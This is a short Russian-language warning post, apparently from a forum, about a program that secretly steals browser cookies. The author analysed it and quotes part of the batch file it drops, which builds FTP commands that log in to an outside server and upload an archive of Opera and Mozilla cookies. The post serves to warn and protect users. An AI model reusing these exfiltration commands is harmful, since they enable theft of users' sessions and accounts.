Внимание! Данная программа является вредоносной, т.к ворует cookies Ваших браузеров. Если Вы запускали данное ПО - изучите данное сообщение, удалите все следы данного ПО и выполните антивирусную проверку с обновленными базами, смените Ваши пароли e-mail нарушителя: dimkastrong*****.ru
IP адрес, с которого действовал: 188.114.56.22
Решил скачать и протестировать что же делает на самом деле программа, так как описание было странным и неправдоподобным.
Наверное я мазохист раз тестирую проги на собственной системе на которой работаю =))
При тестировании обнаружилось что программа подключается к ftp серверу.
При углубленном анализе было выявлено что программа создает в папке temp BAT файл следующего содержания:
Цитата
часть кода удалена
echo open 77.221.132.130 > C:\ftp\ftp_cmd.txt
echo USER mascompr agjFcQmAxx >> C:\ftp\ftp_cmd.txt
echo binary >> C:\ftp\ftp_cmd.txt
echo quote PASV >> C:\ftp\ftp_cmd.txt
echo send C:\Antifrost\Antifrost\Antifrost.rar >> C:\ftp\ftp_cmd.txt
echo quit >> C:\ftp\ftp_cmd.txt
ping -n 3 localhost
:end
Для тех кто не понял то это батник копирует куки оперы и мазилы, архивирует их и посылает на фтп сервер.
Автор Тигрь
Не попадайтесь на эту прогу
